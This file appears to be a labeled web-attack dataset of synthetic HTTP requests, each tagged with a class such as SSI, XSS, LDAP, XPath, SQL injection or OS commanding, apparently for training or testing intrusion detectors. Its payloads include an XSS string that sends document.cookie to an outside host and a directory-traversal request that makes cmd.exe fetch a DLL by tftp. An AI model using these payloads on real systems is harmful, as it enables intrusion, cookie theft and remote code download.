GET /aZKU0d.ABJek/ynAide/h_Pj8mEVrZas6@W/gJw2Q6/iSt4Bfi@wp5rpRgU2N/9GD2fZ./9.OT.bLvPjJ.jpg?I.7OBrfTt=c&fsrNlLe44n=%3C%21--%23exec+++++cmd%3D%22c%3A%5Cprogra%7E1%5Cepjaxe%5Ccl0es9wif%5CedinAzjj.exe++++d%3A%5Cnthaf%5Cwww.etlirerili.org%5Cdqer%5Cdatabase.mdb+++++%2Fx++exporttofoxpro%22--%3E&spoiolToisp7O=nadUhse&qeydSeaocuclsw=gf8CJhf0Qp&A5QGYMSI-X39=622&execT8varnode=89102&ee4bldshsG=82 HTTP/1.0
Host: 20.8.209.196
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342;q=0.1, iso-2022-jp
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=72
Client-ip: 239.88.55.52
Cookie: atoaiaoe=Mpasswdranbiaulgaaccept me];9eewbpir=ein6z;3bodyBKHdZZE=8138;etnlo=6
Cookie2: $Version="373"
Date: Sat, 10 Jan 04 01:38:50 CET
ETag: W/"BreSvbANyEzg2vf5"
Expect: uesime7x
From: rpic1ucn@6o6hir.ch
If-Modified-Since: Wed, 01 Jun 05 09:24:43 UTC
If-Unmodified-Since: Thu, 11 Sep 08 04:08:46 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Nov 06 06:04:27 UTC
Max-Forwards: 27
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: intehp 4edI=sr6n1ysd
Authorization: tuinwa rtetnaLo=neheibee
Range: -2115,0045-233,-51
Referer: /Tuyi.tar.gz
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: 7osu (iBvhIjyP; 8.r-@lZe0I; i3w@6-.)
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8587x911
Via: FTP/5.7 www.medil.htm, 5.7 www.7tarde.gif, HTTP/0.6 115.147.19.223
Transfer-Encoding: tSeat
Upgrade: doiAa/8.2, ttps1j/4.1, hje/0.9, idg/3.2
Warning: 196 2.26.22.3:993 "ye78torehxsveoUeewSd" 
X-Forwarded-For: 232.141.193.11
X-Serial-Number: 475557970524
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40319
Start - Id: 37869
class: LdapInjection
GET /breplaceA68/Eqiq/n8KhXWryDL/isei0ewzdsi/KautoexeccpvViv0rnc/qijnrnuuH2oafwnhe/RgqU5L6XOSc5JRX/c8QYKcbin/aqdgoaA.htm?vGlWP1fS0bodyiN=%29++%28+%7C++%28displayName%3Dhad*%29%28name+++%3D+++had*+%29%28+++mail%3Dhad*++%29&lyeioloO=56&6loHugzeus=a9U_6r&yee=2918&0ef=7344425529&dItwrrvdK=88080958&afnieoNirttooi=57461228&isaairprfti=srhp9&EY_@nimgjdJ4su=tsui HTTP/1.0
Host: www.fmko.net:000
Connection: keep-alive
Accept: image/*
Accept-Charset: isiri-3342;q=0.2, x-mac-icelandic;q=0.7, iso-10646-ucs-2
Accept-Encoding: *;q=0.7
Accept-Language: hnnnl-ah, onxeAti-sonb3;q=0.4
Cache-Control: no-cache
Client-ip: 223.162.219.7
Cookie: htpassRzZftp-iD=p1ApvWn;0hnYcttsnite=ebo
Cookie2: $Version="288"
Date: Sat, 23 Oct 04 17:23:51 CET
ETag: W/"2FKzg9Sm9Ylt2ij82H"
Expect: 100-continue
From: dxmog@eeOtwtfr.com
If-Modified-Since: Sat, 26 May 07 01:43:39 CET
If-Unmodified-Since: Fri, 01 Aug 08 09:26:01 CET
If-Match: "ZCcjF3mjaH5DPP0fpZa"
If-None-Match: *
If-Range: *
Max-Forwards: 954
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Atfeo UKet=rucegw
Authorization: vcyoe XEolGpxu=defga
Range: 89-,46-035533,8-609
Referer: http://facE.st/Hs3tAn/eppcc/ra5lrer/ekdbp0/geeteh.php4
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.3 (X11; U; Solaris 4.6; ee-ds; rv:6.0.1) Gecko/38129603
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: iNhtts/2.7 www.Trst.css:6819, 6.8 9.233.253.163
Transfer-Encoding: gzip
Upgrade: ebe0En/4.3, C7ar5/8.8
Warning: 785 154.219.196.57 "riredam4aosbhnieNsek" "Wed, 10 Jun 09 10:24:56 CET"
X-Forwarded-For: 32.94.96.206
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37869
Start - Id: 47797
class: XSS
GET /3ZcUzvCX./N0dL/W6n4httpsGUJT2Ir/iam/ncasnjttdams8/eBB8Kq0pd2r5b7F/d8boTtgde6uKcYJK/t1abtrrhseabc4nnhkef/t0kaoeeuteeUbcov.htm?erneiy5euitx=u7XqT&pD8fntAo=7711&R21493eta=yewepessohanp&eisnedmTt=tlyG_&KW24havingX0=%3Cform%2Bname%3Dteleas%3E%3Cselect%2Bname%3Ds1Ar++%3Ehttp%3A%2F%2Fwww.R.com%2FoenEd%2F%3F%3C%2Fselect+%3E%3C%2Fform++++%3E&yl2esme=2dlbrefnnulla&nnee2nwngMe=esabB35Cq HTTP/1.0
Host: 135.85.129.159
Connection: atopi
Accept: image/*;q=0.4, video/quicktime;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.4, identity;q=0.0
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 19.80.216.59
Cookie: adminJiyq=6575;rEPVFlWv=142
Cookie2: $Version="437"
Date: Sun, 20 Dec 09 24:13:20 GMT
ETag: W/"mZkuiGTeMtfC09@N"
Expect: mihtnn
From: dRkiaeue@o6si.cz
If-Modified-Since: Sat, 03 Nov 07 16:38:44 CET
If-Unmodified-Since: Tue, 12 Jan 10 21:03:57 GMT
If-Match: *
If-None-Match: "0QiSEmup8eShnWI@g.eh"
If-Range: Fri, 17 Aug 07 10:37:17 CET
Max-Forwards: 20
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest username="oaid"
Authorization: Basic ZWRTMTp2VzJveWU=
Range: 56-,617417-
Referer: /doense/Eecekj.asp
TE: deflate,deflate;q=0.9,trailers
Trailer: Accept-Language
User-Agent: SOpa0/0.0
UA-CPU: x86
UA-Disp: 184,045,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5941x524
Via: 3.7 57.239.25.118
Transfer-Encoding: compress
Upgrade: cOeQ/0.4, boyed/0.6, stEhr/6.5, lfqeh/2.9
Warning: 828 187.164.150.25 "gathtunnr5k6dxt7" "Sat, 23 Apr 05 07:02:53 UTC"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 14491
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47797
Start - Id: 47690
class: XSS
GET /R6insert4GE7aQiCqa/yyoEomitepx/ur/sef9it9F@0i/sdxGvrd6GqKOmgmYJY/ahtoteotatndAtfhed/ydUetc.msf?loonomdt=9466128&tt=5tdn&Eoneyse5azt6ag=ada%5DrVscript%7Eo06mrmmtla&tJnl=6381326&omna3dbriz0=nnirJdueae&Et7sarlmh30e=cNR%3Eily66dvyij&Iooedo=moojDruU%7Crro%3Cvner&rhnyMrEruee=%3Clink+rel++++%3D++%22+++stylesheet++%22++href++%3D%22+++++javascript%3A++++%5Balert+%28%27ncRp%27%29%3B%5D+++%22%3E&vo=3969576540&mu0ntlenk1na=59836997&hbt00hsa=ojal6&tBcatRjt=9xX%408Duswhr HTTP/1.0
Host: www.Dtso.cz
Connection: keep-alive
Accept: image/*, video/mpeg;q=0.5
Accept-Charset: windows-874, iso-8859-8, ks_c_5601-1987;q=0.8, windows-1250;q=0.2, euc-tw;q=0.0
Accept-Encoding: 
Accept-Language: e6ssaoa4-sddj, z3evDlez-tur;q=0.1, lsh-8yfage4p;q=0.9
Cache-Control: nws=sTatsnse
Client-ip: 45.106.75.118
Cookie: Eomdthteiacdi=oE3tr5bin;1ok=e/uevusr etg
Cookie2: $Version="744"
Date: Sat, 17 Jun 06 12:54:04 CET
ETag: "q6nx_Fxx.CKJc6Kk"
Expect: wmt6or
From: maxEoc8e@ae6eyisrl4.biz
If-Modified-Since: Wed, 11 Aug 04 17:52:22 GMT
If-Unmodified-Since: Fri, 13 May 05 13:44:06 GMT
If-Match: *
If-None-Match: *
If-Range: "a-ZpQlzTiI8L.Fl3"
Max-Forwards: 55
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: sxorov avcea=rose
Authorization: Basic dDlyeWxyYUg6ZXdvTHQzZQ==
Range: 57-,235-9884,973-85
Referer: http://w91t.it/nooe7lyE/raAys3hm/Tnsum/tsSbo0eh.sh
TE: trailers,deflate;q=0.8,gzip;q=0.5
Trailer: From
User-Agent: ewft5ehei (0mMUdMmtxU; tohFiH3e; w8CqcqoyQ; e7@it3Giv; 1-7ihNZ)
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 934x7117
Via: 9.4 www.ao3itLj.html, FTP/2.7 104.74.153.1:652
Transfer-Encoding: compress
Upgrade: e33s9E/0.6
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47690
Start - Id: 37703
class: LdapInjection
PUT /oshsaihdQ3Ac7i/eMEWZkq@cTQ.bRt/yGyfbcahEj5aule0To/qK/8da/ioORQl7h4PI@kn/K@C0U/rie/e7yqvD85z44vw.Zilp_/likeFB/fjLvnCuGq.dll? HTTP/1.1
Content-Length: 332
Content-Language: r,b
Content-Encoding: identity
Content-Location: http://sutea.biz/dasat.gif
Content-MD5: NmVyb2F0ZXNsbW8zZWxpYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 Nov 08 03:24:45 GMT
Last-Modified: Mon, 03 Jan 05 05:56:02 GMT
Host: www.twfLnut.uk:3099
Connection: close
Accept: image/png, application/postscript
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 237.81.61.20
Cookie: arm@%un3uQNk=8;xpmatpkaemOtl=naG7M;eR=rrt%7E%25sata0n4ei
Cookie2: $Version="98"
Date: Fri, 14 Mar 08 03:28:31 GMT
ETag: "n4cBYNpmLWIikXUq4-kH"
Expect: 100-continue
From: nRYbeaTm@ivguoee.org
If-Modified-Since: Sun, 30 May 04 15:26:48 UTC
If-Unmodified-Since: Thu, 18 Dec 08 03:12:17 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 21 Nov 04 21:52:05 UTC
Max-Forwards: 5463
MIME-Version: 4.9
Pragma: R='cetrecei'
Proxy-Authorization: NTLM bTRhZWRxbDBkaWhlcmFydXJtSGVvMWN0cHJlZWNuZG1lamVsbw==
Authorization: NTLM c0RkUG5vc2ltNml0aGxlTnNiaXRrbG5lYWljbm9lZm5oYmY=
Range: 90513-
Referer: /tl3un.js
TE: chunked,gzip
Trailer: Range
User-Agent: Mozilla/4.0 (Machintosh; U; PPC Mac OS X 6.8; aa-eb; rv:5.3.5) Gecko/31312756
UA-CPU: MIPS
UA-Disp: 0739,408,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 940x1719
Via: 2.1 14.91.240.203
Transfer-Encoding: deflate
Upgrade: oia/6.0, uNfl/8.0, net/8.9, ai8/5.6
Warning: 819 www.ttnhr.shtml "rog8prr93m" "Wed, 03 Mar 04 11:36:52 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 3901331377594
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

odoyf=3763&itelnetKD=Liean&f3uotfecito=48320611&5w5iiiooal=/evt;NonS0hltt>d&pyXz=4GPnHD&czk=un&tnthuMslEerafh=ym4egnxIalln2one&og52te73ek=0Sidqwxw&jc1yc7ohr=091543&YUnph-Cqfc=44)(&(objectClass=RTso)(|(sn =sdy)(cn=nse   J*))&Lcru42ILefelx=dnsnr &dhFa1h0kxzNee=3&1mia=cfnL&dn0=02&SWx2lO=rvFRM4hic6L

End - Id: 37703
Start - Id: 46721
class: XSS
GET /tic@AOylTJ3lVEsdM9y/0GN_3Pi9GP/cqLSc121A3/aHHg1oFStz-7/rRpOpWQasE1THY/cCh2tTR@zgc/pS/aVAECGL9zAxGqG/mBtHjJ_a/asEnoxCUTdmK/hCaYuPQ7osA/qG1Dp1rq8BWLS.msf?3oeibatfaseoi=00Mh0lhmetapositiont&etog=okoyKemw&trtetxivx=1AoeRlhc&etob=emwoE&xhhettew7fta=mtri2otaathnrit&mtsB4B-=2&T28f=E&fSpbnqrEordw=7&jevaC=11130&9una=52968&b5BdBOqpgMB=htaccessl&lenqezn=i&bmeqts=36604 HTTP/1.0
Host: 143.19.126.65:37
Connection: close
Accept: text/html, image/*;q=0.7, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: r-ywncypt;q=0.2, e-kse8hjrs;q=0.9, Tce-rsE
Cache-Control: max-stale=8928
Client-ip: 166.114.115.219
Cookie: afUxretor=sBdZb;4stdinKc8perlNQGDH=9276621;sZY3=<img src  =  "     dens  >"  onmouseover    = "  [alert  ('lohfumDE');]  "  >
Cookie2: $Version="57"
Date: Sun, 25 Apr 04 18:02:47 CET
ETag: W/"0d8_3YwJZ6x_bpH"
Expect: 100-continue
From: tlpU2@Ewhhaeft0.org
If-Modified-Since: Tue, 06 Sep 05 24:55:56 CET
If-Unmodified-Since: Wed, 13 May 09 18:41:55 CET
If-Match: "Yb@qAy8XZmB9SmV"
If-None-Match: *
If-Range: Thu, 04 May 06 23:31:52 CET
Max-Forwards: 44
MIME-Version: 5.4
Pragma: owlsl=az3
Proxy-Authorization: Basic TmU4YTp2a0FvNm0=
Authorization: Basic dnNsYmRjNG46ZG1wcg==
Range: -4,-90,-87939
Referer: http://4t8e6bem.st/isjkRgit/Ttd1rn/ueup5/cytBiise/ulWwN.asp
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: dxkemote (e_UzRAUNGg; tE0nm@qV; a9xAqo; aBXIG1EJM; oyW1ig)
UA-Disp: 365,342,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3720x7004
Via: 6.8 www.kwebatrL.jpeg
Transfer-Encoding: compress
Upgrade: cips/9.2, sovfy/0.4, Tuweh/3.9, dzd/8.5, do6/5.7
Warning: 791 www.iyhfNt.shtml:6970 "Ses9wrahboraa" "Sun, 03 Jan 10 05:50:14 GMT"
X-Forwarded-For: 166.176.57.0
X-Serial-Number: 15071765483594202
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46721
Start - Id: 49324
class: XPathInjection
GET /5fromvU9childJ_shiP.msf?eaoe=847884952&r1YKz_8x.Z6f=A%3B&vausf=sear%27++or++1%3C+++Rsu0%2Ftru%2F5eetse%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D42%5D++or+%27sth%27++++%3D+%27 HTTP/1.0
Host: 158.8.167.166:81
Connection: keep-alive
Accept: video/quicktime;q=0.3, video/quicktime, audio/x-wav
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.5, compress;q=0.9, compress;q=0.5, gzip;q=0.5
Accept-Language: 3i-olspriu, newroi-V;q=0.3, aEqh-t;q=0.2
Cache-Control: max-age=66551
Client-ip: 66.86.201.155
Cookie: eetn=dt%e4AnAer$BeE;EJicm=85402192;daer0e5=teoy2Aaax;bN0szTqrassin=0
Cookie2: $Version="864"
Date: Tue, 13 Feb 07 22:51:52 GMT
ETag: "BoY2OwHYJAF2CRWj"
Expect: dIehaWe=esyeo;tx6ezea=Ee5h3s2
From: tailcrn@aoedhlvnA.it
If-Modified-Since: Mon, 08 Sep 08 24:30:08 GMT
If-Unmodified-Since: Mon, 09 Nov 09 18:43:49 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Oct 08 07:28:24 UTC
Max-Forwards: 77
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest response="d0ae87B45D5a7ceD8A37AdE3bc88eEd6"
Authorization: Basic c29pZTplbHRxcmVN
Range: -8
Referer: http://njusz.be/eo1ynq/whtoEs/xeha4.jsp
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: s5ii6ylatjE
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: 4.5 www.emhukO.tiff, FTP/7.8 www.ansa.tiff
Transfer-Encoding: ou80
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 462 247.12.174.34 "laiyomneitoohpnNd1mn" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 09521
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49324
Start - Id: 41404
class: SqlInjection
POST /hC/pe9rsgEato/B-74X1p1TXB0FO/eThaS@9Z/CiiexechVconnectl6ea4M9x/awesnSshiotsd.aspx? HTTP/1.0
Content-Length: 194
Content-Language: ta,laet
Content-Encoding: compress
Content-Location: http://www.fahysa.com/tPengeuR/rnae39iU/np6sto6c.swf
Content-MD5: dGpwcG5obnJnYWxzdWVpYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Jul 07 23:12:59 GMT
Last-Modified: Fri, 06 Oct 06 13:57:12 GMT
Host: 197.36.189.212:80
Connection: ysoawoth
Accept: application/rtf, text/plain;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nfc7nc6-nfadl;q=0.8, c9se-h;q=0.1
Cache-Control: max-stale=56020
Client-ip: 87.5.203.76
Cookie: n0=7597;idt39Xks='ta;na=82;btisaytrk0cH=27711540;rfThihr=Oetrasleax
Cookie2: $Version="59"
Date: Sat, 21 Nov 09 16:17:00 CET
ETag: "rHeFjrsZGZRJDQJiVfX"
Expect: 5ERmu=ncdsee
From: xttrniQd@tSeAtnO.net
If-Modified-Since: Sun, 18 May 08 09:14:33 CET
If-Unmodified-Since: Sat, 18 Mar 06 18:45:56 CET
If-Match: "SBsCTqXFyrKc5bKe6G5"
If-None-Match: *
If-Range: *
Max-Forwards: 28
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: cTtsb nlsttnre=nmx5nae7
Range: 24-
Referer: /eod0.pdf
TE: trailers,trailers,gzip
Trailer: If-None-Match
User-Agent: rgGYBDmOyg http://www.dsoecx.gov
UA-CPU: StrongARM
UA-Disp: 0223,7526,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1178x5140
Via: FTP/4.6 231.27.85.77
Transfer-Encoding: identity
Upgrade: etntne/4.1, Iossd/8.2
Warning: 643 191.194.177.159 "m5pnsfytke" "Thu, 04 Dec 08 02:42:59 GMT"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 15055892627895380
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

savteesTtbh=OR   'nl0st'     = 'Sim'+'ple'&e9ios7etb=88435856&IhdZlsas=sn(iez&rergtnwkseTtt=hno&biedy=rdeOwstebpCS&gpeuyxoudfuTn=524&rttpeTeen7d=e&&oa5eabWtu0ahuvd=e%uehome

End - Id: 41404
Start - Id: 46817
class: XSS
POST /rIl@Q9P/eaVeh3tieon/iooowReeueshtawq3d/hieFrySmmerongtntsws/8g/8dnto6nstOdctfntetn/selectKMNT0KUDqMJ4G7/PQSoMI6M_KpN/hNcaGr.swf? HTTP/1.1
Content-Length: 277
Content-Language: u,snr
Content-Encoding: deflate
Content-Location: /pRtscea/oz8iesze.gz
Content-MD5: YjJpeHBsYmxkaWhjQXRvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Nov 09 16:34:18 CET
Last-Modified: Sun, 31 Jul 05 12:28:43 UTC
Host: www.tNnier.uk
Connection: genur
Accept: */*;q=0.2
Accept-Charset: windows-1254;q=0.3
Accept-Encoding: gzip;q=0.9
Accept-Language: mcehe0l5-a0, iHke-0Mrtsrr2;q=0.8, ts-i;q=0.6, ht-8eo, e-coq
Cache-Control: no-store
Client-ip: 243.103.48.36
Cookie: veNrduoigi2yiKa=dnvEJ2sxneooH;irr8ejw=08
Cookie2: $Version="70"
Date: Mon, 10 Jul 06 07:48:33 GMT
ETag: W/"clqO4HlZF-77um5s4W"
Expect: taanns
From: wdvoio@iotd9eelwd.de
If-Modified-Since: Sat, 29 Sep 07 19:10:27 UTC
If-Unmodified-Since: Sun, 14 May 06 11:14:27 UTC
If-Match: "UX8X8CcOtW5iCLhIO2"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dGncrnt"
Authorization: NTLM ZVVyZTYwaWZzM2VlaW9ycm1IZm5zZW90bTRDaHMyaDd1
Range: 175390-78,55-,908690-
Referer: http://www.rl1terho.ch/9iTw.bin
TE: trailers,gzip;q=0.3,trailers
Trailer: Referer
User-Agent: 2IlsjY http://www.32nzdbt.de
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 818x5674
Via: Rxqa3/5.6 www.1aoe.png, 2.3 85.210.165.210, exqitq/8.5 www.vndr3arh.tiff
Transfer-Encoding: identity
Upgrade: haroE/4.5, c7ae2/5.1
Warning: 793 241.179.195.131 "halAIevnm" "Wed, 27 Apr 05 17:07:05 CET"
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 80684101
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3_na=53&ArercpgBEKN.vr=<img  src =  "    javascript:    [document.location.replace  ('http://www.arne.com/cgi-bin/liistrtrra.cgi'+document.cookie);]    "  >&rehontuoe=hlobwurerorO1&servicesXxmvaoD9MLS=306727&9d5null=of8&9cXbkBkL0=5hWiaC__2

End - Id: 46817
Start - Id: 44208
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.1
Host: www.c3cTealrg.st
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: wc-o;q=0.2, bomtneh-e;q=0.6, edhe-an;q=0.4
Cache-Control: min-fresh=668
Client-ip: 99.103.6.37
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="370"
Date: Wed, 31 Aug 05 09:40:43 UTC
ETag: "wFfcy3k9UPL1p_h.3m"
Expect: wgeo
From: rOaz@gEadsxsee.biz
If-Modified-Since: Fri, 26 May 06 01:36:34 CET
If-Unmodified-Since: Wed, 16 Mar 05 17:13:38 CET
If-Match: "q5R_iJd7rkezGVZ"
If-None-Match: *
If-Range: "d@c@y9vnj9R@FcJY-V"
Max-Forwards: 7
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic aXROTzN0OmZlaWM=
Authorization: 9w0nEe Hqmzed=bebg
Range: 09660-850419
Referer: http://www.csosbked.net/3Dnce/rrcd/hyatidm.png
TE: gzip,trailers,chunked;q=0.6
Trailer: User-Agent
User-Agent: towmsyrci (apzDc0zw; r@NFupT; 2@cRLh9O; npy0_FDm; e.46Nc)
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 953x6132
Via: 0.8 182.92.87.114, 2.4 www.tariw.css
Transfer-Encoding: compress
Upgrade: eEEr/2.5, y9ejm/8.5, Nwaeld/9.4, tc4/7.0
Warning: 500 167.56.88.243 "a4steEosrC3cbant" "Thu, 15 Jul 04 08:17:33 UTC"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44208
Start - Id: 39141
class: SSI
GET /2J2ucXMPF.8Vx/i26C.VseE--/aYp4ganlnhsEUawin/0n/tEB7awA4H/Lsock_streamgs/rffebw/lNSQj5mhS.44Tf_.gif?eecxksnnreiiec=759251&lktlSr3aesra=r%5DvD%25s%3Btca&EuRsh=%5B%29group+by&eqkeui04n=aSyRc0mn&LDV7r=nu%7Csuwgeteylac%5BE8%29&adns=tdMy10NFA-&lvxg=1dzswiNt&zfsw=9346&iriiflegilss=9jee%3Apositionong1&0dx-bodyM-divH=hsk%7Elez&hRxlmie=uRasLitLi+oems&ees=el7Mjj2oJ5 HTTP/1.0
Host: 129.155.164.147
Connection: close
Accept: text/*;q=0.9, application/postscript;q=0.3
Accept-Charset: iso-8859-1;q=0.8, windows-1252
Accept-Encoding: <!--#exec     cgi="/cgi-bin/script?eetchnacE"  -->
Accept-Language: *;q=0.7
Cache-Control: max-age=617
Client-ip: 19.255.101.192
Cookie: rsgoAiEheors=984152;zaaYilrbaovxE=axk_R9kH@9;4u=tp;earrRofrem=A;tmisKc52SeH=evovohIc;mz_sw=g eahlkoiincludee
Cookie2: $Version="503"
Date: Sun, 07 Nov 04 07:28:05 GMT
ETag: W/"3lm3ehkeXKSz7_2xl@"
From: dwtnbtl@re8os1r5d.org
If-Modified-Since: Mon, 26 Jan 04 10:23:27 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Jun 06 14:10:15 CET
Max-Forwards: 4
Proxy-Authorization: Basic YU9tbm9yOm9uYWw=
Authorization: 4srCbj 2fS0Y=3dxIys
Range: 85-9,-11
Referer: http://www.cosO.it/awwwn/4het/torotnT.png
TE: trailers,trailers,trailers
User-Agent: ihot (lmvYTMvfo; c-KrlL@4; hAjWc3g9; yq.zlPx)
UA-CPU: StrongARM
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 855x947
Via: qtom/6.4 www.de8ft.tiff
Warning: 601 129.18.108.121 "hesrsMelefcoI" 
X-Forwarded-For: 112.205.75.183

null

End - Id: 39141
Start - Id: 39428
class: SSI
GET /hneorm7oeewtsci/rn82tCbn/tCSy2fExTXbQwT/uctk.php3?JV2iQ=307&Uie=19&71uhco=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&cmuqAeTlmwa=480962 HTTP/1.1
Host: www.5stirhse.fr
Connection: 1gegma
Accept: video/*
Accept-Charset: x-mac-arabic, euc-jp;q=0.0, cp-932;q=0.0, x-mac-hebrew, x-mac-cyrillic
Accept-Encoding: compress, compress;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 126.45.36.156
Cookie: knLlooep9ba4Aft=6e;dnxtaxnhinzmoPt=nsXy
Cookie2: $Version="308"
Date: Sun, 30 Nov 08 01:53:10 CET
ETag: W/"qlXtqujxENs2lqE1RtE"
Expect: 100-continue
From: w3by414@hseh.net
If-Modified-Since: Thu, 18 Feb 10 12:31:28 GMT
If-Unmodified-Since: Sun, 20 Nov 05 16:43:22 UTC
If-Match: "aB5KlgUag0TmNfM"
If-None-Match: "-o1KkDjwYbSvMHeru"
If-Range: "UEN237j9xGISaWF.2JR"
Max-Forwards: 6813
MIME-Version: 3.5
Pragma: ht=hOmppd
Proxy-Authorization: rashN riiam=cssstki
Authorization: Basic c2FsZ250OjlzcDB0
Range: -07524
Referer: /oriefvAs/not2t9/osiai4uo.png
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.0 (compatible; MSIE 6.6; Linux i586; nitedt2r; l7ny; ohaPl3e)
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3896x417
Via: 1.4 www.i6Bq.gif:29, 8.9 117.112.188.30, 8.2 www.morecd.jpeg
Transfer-Encoding: identity
Upgrade: Tnfr/9.0, twtet/7.7, sbse/4.5, iht/4.1, rei/1.4
Warning: 280 113.181.5.189:613 "neo5iip" "Wed, 20 Feb 08 05:16:28 CET"
X-Serial-Number: 7022355683967600
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39428
Start - Id: 35781
class: XPathInjection
GET /he4o/ruvd@xj.shtml?faatieejrsEtte=62126&9metaS4E=dEwt%27+++++or+++1%3C+++Sc%2Ft%2Fd%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D0%5D+or+%275f%27+%3D+++%27 HTTP/1.1
Host: www.sac8jwenHe.com:80
Connection: nHIb
Accept: */*;q=0.6
Accept-Charset: cp-932
Accept-Encoding: gzip;q=0.4, compress;q=0.9, compress;q=0.0, identity;q=0.5
Accept-Language: oseU3eha-spae, 2ees7lr-hchj, i6ag-wrmtvt;q=0.6
Cache-Control: gi=6
Client-ip: 198.194.18.206
Cookie: bgawioryanqi=teg\os rci;Esro=89210;rreerp=168
Cookie2: $Version="292"
Date: Sat, 17 Jun 06 13:54:31 GMT
ETag: "Svs2sVNwEB_MZhVF"
Expect: tz6uti0s=zmuahwp;imcC=ywma7
From: debl@hectstms.net
If-Modified-Since: Sun, 01 Jun 08 24:21:11 CET
If-Unmodified-Since: Thu, 19 Jan 06 24:34:39 UTC
If-Match: "CLGYTEeTI8-h2dVGGjt"
If-None-Match: *
If-Range: Thu, 21 Oct 04 01:43:36 GMT
Max-Forwards: 9326
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic Z3Nwcjp5bVNvZWJqQQ==
Authorization: Digest opaque="rreati"
Range: -777
